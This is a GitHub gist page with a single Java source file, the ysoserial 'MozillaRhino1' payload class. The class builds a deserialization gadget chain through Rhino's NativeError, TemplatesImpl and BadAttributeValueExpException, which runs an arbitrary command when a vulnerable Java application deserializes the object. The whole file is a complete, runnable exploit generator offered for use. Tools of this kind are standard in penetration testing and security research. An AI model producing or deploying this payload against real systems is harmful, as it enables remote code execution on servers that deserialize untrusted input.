Created
January 4, 2022 05:10
-
-
Save Q5Ca/aba457432f8b0062fc5531c7f9dc4bcd to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| package ysoserial.payloads; | |
| import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; | |
| import sun.org.mozilla.javascript.*; | |
| import ysoserial.payloads.annotation.Authors; | |
| import ysoserial.payloads.annotation.Dependencies; | |
| import ysoserial.payloads.annotation.PayloadTest; | |
| import ysoserial.payloads.util.Gadgets; | |
| import ysoserial.payloads.util.JavaVersion; | |
| import ysoserial.payloads.util.PayloadRunner; | |
| import ysoserial.payloads.util.Reflections; | |
| import javax.management.BadAttributeValueExpException; | |
| import java.lang.reflect.Constructor; | |
| import java.lang.reflect.Field; | |
| import java.lang.reflect.Method; | |
| /* | |
| by @matthias_kaiser | |
| */ | |
| @SuppressWarnings({"rawtypes", "unchecked"}) | |
| @PayloadTest( precondition = "isApplicableJavaVersion") | |
| @Dependencies({"rhino:js:1.7R2"}) | |
| @Authors({ Authors.MATTHIASKAISER }) | |
| public class MozillaRhino1 implements ObjectPayload<Object> { | |
| public Object getObject(final String command) throws Exception { | |
| Class nativeErrorClass = Class.forName("sun.org.mozilla.javascript.NativeError"); | |
| Constructor nativeErrorConstructor = nativeErrorClass.getDeclaredConstructor(); | |
| Reflections.setAccessible(nativeErrorConstructor); | |
| IdScriptableObject idScriptableObject = (IdScriptableObject) nativeErrorConstructor.newInstance(); | |
| Context context = Context.enter(); | |
| NativeObject scriptableObject = (NativeObject) context.initStandardObjects(); | |
| Method enterMethod = Context.class.getDeclaredMethod("enter"); | |
| NativeJavaMethod method = new NativeJavaMethod(enterMethod, "name"); | |
| idScriptableObject.setGetterOrSetter("name", 0, method, false); | |
| Method newTransformer = TemplatesImpl.class.getDeclaredMethod("newTransformer"); | |
| NativeJavaMethod nativeJavaMethod = new NativeJavaMethod(newTransformer, "message"); | |
| idScriptableObject.setGetterOrSetter("message", 0, nativeJavaMethod, false); | |
| Method getSlot = ScriptableObject.class.getDeclaredMethod("getSlot", Object.class, int.class, int.class); | |
| Reflections.setAccessible(getSlot); | |
| Object slot = getSlot.invoke(idScriptableObject, "name", 0, 1); | |
| Field getter = slot.getClass().getDeclaredField("getter"); | |
| Reflections.setAccessible(getter); | |
| Class memberboxClass = Class.forName("sun.org.mozilla.javascript.MemberBox"); | |
| Constructor memberboxClassConstructor = memberboxClass.getDeclaredConstructor(Method.class); | |
| Reflections.setAccessible(memberboxClassConstructor); | |
| Object memberboxes = memberboxClassConstructor.newInstance(enterMethod); | |
| getter.set(slot, memberboxes); | |
| NativeJavaObject nativeObject = new NativeJavaObject(scriptableObject, Gadgets.createTemplatesImpl(command), TemplatesImpl.class); | |
| idScriptableObject.setPrototype(nativeObject); | |
| BadAttributeValueExpException badAttributeValueExpException = new BadAttributeValueExpException(null); | |
| Field valField = badAttributeValueExpException.getClass().getDeclaredField("val"); | |
| Reflections.setAccessible(valField); | |
| valField.set(badAttributeValueExpException, idScriptableObject); | |
| return badAttributeValueExpException; | |
| } | |
| public static void main(final String[] args) throws Exception { | |
| PayloadRunner.run(MozillaRhino1.class, args); | |
| } | |
| public static boolean isApplicableJavaVersion() { | |
| return JavaVersion.isBadAttrValExcReadObj(); | |
| } | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment